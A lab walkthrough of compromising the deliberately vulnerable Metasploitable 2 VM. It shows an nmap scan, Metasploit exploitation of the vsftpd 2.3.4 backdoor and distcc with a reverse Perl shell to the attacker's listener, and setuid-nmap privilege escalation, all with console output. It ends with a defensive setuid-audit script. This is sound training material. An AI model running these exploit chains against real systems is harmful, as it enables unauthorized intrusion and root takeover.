There is a second, newer release of Metasploitable (Metasploitable 2), which is downloadable from here:
http://sourceforge.net/projects/metasploitable/
It has most of the services from the old edition and quite a few new ones.
Here is the NMAP scan:
root@kali:~# nmap -sS -A 192.168.1.23 -p1-65535
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-10 08:21 CET
Nmap scan report for 192.168.1.23
Host is up (0.00051s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after: 2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-10T07:23:51+00:00; -2s from local time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37592/tcp mountd
| 100005 1,2,3 38749/udp mountd
| 100021 1,3,4 48184/udp nlockmgr
| 100021 1,3,4 49513/tcp nlockmgr
| 100024 1 41287/tcp status
|_ 100024 1 48160/udp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: )%{aRYF2h4j:$B`>RcyY
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Throttled: Reconnecting too fast) -Email admin@Metasploitable.LAN for more information.
6697/tcp open irc Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Too many unknown connections from your IP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34829/tcp open unknown
37592/tcp open mountd 1-3 (RPC #100005)
41287/tcp open status 1 (RPC #100024)
49513/tcp open nlockmgr 1-4 (RPC #100021)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 37592/tcp mountd
| 100005 1,2,3 38749/udp mountd
| 100021 1,3,4 48184/udp nlockmgr
| 100021 1,3,4 49513/tcp nlockmgr
| 100024 1 41287/tcp status
|_ 100024 1 48160/udp status
MAC Address: 00:0C:29:A1:61:F8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2013-11-10T02:23:49-05:00
TRACEROUTE
HOP RTT ADDRESS
1 0.51 ms 192.168.1.23
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds
Again, as there are way too many options here, and exploiting them with MSF is easy, I will show two methods and leave the rest to you.
Method 1 - via FTP
After a bit of searching we find that there is an MSF exploit for the installed vsftpd version:
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
Running it we get a root shell immediately, most likely because the service runs with root privileges.
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.23 yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
id
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.17:34683 -> 192.168.1.23:6200) at 2013-11-11 21:24:13 +0100
uid=0(root) gid=0(root)
ls /root
Desktop
reset_logs.sh
vnc.log
Method 2 - distcc + nmap
This time I picked the following exploit (again, found with a Google search on the service name):
https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.23 yes The target address
RPORT 3632 yes The target port
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.17 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > exploit
[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 2 opened (192.168.1.17:4444 -> 192.168.1.23:60752) at 2013-11-11 21:27:52 +0100
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
You can send the session to the background with CTRL + Z. For privilege escalation I chose this module, and it worked:
http://www.rapid7.com/db/modules/exploit/unix/local/setuid_nmap
msf exploit(setuid_nmap) > show options
Module options (exploit/unix/local/setuid_nmap):
Name Current Setting Required Description
---- --------------- -------- -----------
ExtraArgs no Extra arguments to pass to Nmap (e.g. --datadir)
Nmap /usr/bin/nmap yes Path to setuid nmap executable
SESSION yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files
Exploit target:
Id Name
-- ----
0 Command payload
msf exploit(setuid_nmap) > set SESSION 3
SESSION => 3
msf exploit(setuid_nmap) > exploit
[*] Dropping lua /tmp/ckhDpdXy.nse
[*] Started reverse double handler
id
[*] running
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qDkuWOTbsfd2gBW5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nqDkuWOTbsfd2gBW5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.23:43019) at 2013-11-11 21:34:51 +0100
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
ls /root
Desktop
reset_logs.sh
vnc.log
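The escalation above only works because /usr/bin/nmap carries the setuid bit, so the fix on a real host is an audit of setuid files rather than a patch. The script below is an added example, not part of the original post or of Metasploit: it walks a directory tree, collects regular files with the setuid bit, and sorts them into expected (standard setuid tools), dangerous (tools that can run scripts or spawn commands and therefore must never be setuid root) and unknown. The two name lists and the constructed demo tree are this example's assumptions; compare the lists against your own distribution's package manifest.

```python
import os
import stat
import sys
import tempfile

# Binaries that legitimately need setuid on a typical Linux host (assumption of
# this example; verify against your distribution's package manifest).
EXPECTED_SETUID = {"passwd", "su", "sudo", "mount", "umount", "ping",
                   "chsh", "chfn", "newgrp", "gpasswd"}

# Tools that must never be setuid root: they execute scripts or spawn commands,
# so the bit turns them into a privilege-escalation path (nmap is the case on this page).
NEVER_SETUID = {"nmap", "vim", "vi", "find", "perl", "python", "bash", "sh"}


def find_setuid_files(root, uid_filter=0):
    """Walk `root` and return (path, owner_uid) for regular files with the setuid bit.
    By default only root-owned files are returned; uid_filter=None returns all."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID and (uid_filter is None or st.st_uid == uid_filter):
                hits.append((path, st.st_uid))
    return hits


def classify(hits):
    """Split setuid findings into expected, dangerous and unknown by basename."""
    report = {"expected": [], "dangerous": [], "unknown": []}
    for path, _uid in hits:
        base = os.path.basename(path)
        if base in NEVER_SETUID:
            report["dangerous"].append(path)
        elif base in EXPECTED_SETUID:
            report["expected"].append(path)
        else:
            report["unknown"].append(path)
    return report


def remediation(report):
    """Shell commands an admin would run to strip the bit from the dangerous entries."""
    return [f"chmod u-s {p}" for p in report["dangerous"]]


def build_demo_tree():
    """Constructed sample tree: one dangerous, one expected and one ordinary file.
    Returns the temporary directory path (files are owned by the current user)."""
    d = tempfile.mkdtemp(prefix="setuid-audit-")
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755), ("helper", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, mode)
    return d


if __name__ == "__main__":
    # Real use: python3 setuid_audit.py /usr   (root-owned setuid files only).
    # Without an argument, run against the constructed demo tree.
    if len(sys.argv) > 1:
        found = find_setuid_files(sys.argv[1])
    else:
        found = find_setuid_files(build_demo_tree(), uid_filter=None)
    rep = classify(found)
    for bucket in ("dangerous", "unknown", "expected"):
        for p in rep[bucket]:
            print(f"{bucket:>9}  {p}")
    for cmd in remediation(rep):
        print("fix:", cmd)
```

Anything that lands in "unknown" deserves the same question as the dangerous bucket: which package put it there, and does it need the bit at all.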
That's all folks!